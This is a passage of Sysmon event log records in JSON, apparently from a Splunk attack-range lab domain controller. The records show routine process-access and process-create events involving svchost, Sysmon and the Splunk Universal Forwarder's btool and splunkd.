\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3348,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3349,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3350,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3351,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3352,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3353,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3354,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-001000680500}\r\nTargetProcessId: 1576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-001000680500}","TargetProcessId":"1576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3355,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.626\r\nProcessGuid: {E2A3D6B1-1102-5F25-0000-0010C1680500}\r\nProcessId: 4100\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list httpServer --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1102-5F25-0000-001000680500}\r\nParentProcessId: 1576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list httpServer --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.626","ProcessGuid":"{E2A3D6B1-1102-5F25-0000-0010C1680500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list httpServer --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1102-5F25-0000-001000680500}","ParentProcessId":"1576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list httpServer --no-log","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3356,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-1102-5F25-0000-001000680500}\r\nSourceProcessId: 1576\r\nSourceThreadId: 1584\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-0010C1680500}\r\nTargetProcessId: 4100\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program 